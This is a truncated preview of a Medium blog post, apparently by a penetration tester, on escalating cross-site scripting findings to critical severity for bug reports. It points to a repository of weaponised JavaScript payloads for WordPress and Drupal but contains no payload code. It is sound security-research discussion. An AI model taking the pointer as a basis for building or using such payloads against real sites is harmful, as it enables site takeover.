How to Upgrade Your XSS Bugs from Medium to Critical

Photo by Paul Esch-Laurent on Unsplash

TL;DR: Before you report an XSS, look for ways it can be leveraged to increase severity. Here’s my repo containing weaponised JavaScript payloads for popular platforms like Wordpress and Drupal. More will be added in the coming weeks.

It feels like every day that I see another under-leveraged XSS writeup hit my Twitter feed. I saw another one today, I don’t want to name and…




Pentester | Hubby | Musician

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

PDF Download% The Art of Email Security: Putting Cybersecurity In Simple Terms (

Is Online Privacy a Thing of the Past? Big Data and Security at Web Summit 2017

Signs you are a fake Cybersecurity Expert

Is your desk photo giving away important data?

Basic Linux Commands Practiced (OverTheWire Writeup : Bandit)


ARA available now on MetaMask!

A Beginner-friendly Introduction to FastAPI Security

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Luke Stephens (@hakluke)

Luke Stephens (@hakluke)

Pentester | Hubby | Musician

More from Medium

Parameter Pollution - Zero Day

XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain

Rate Limit Bypass at

CVE-2012–6342: Atlassian Confluence — Cross-Site Request Forgery (CSRF)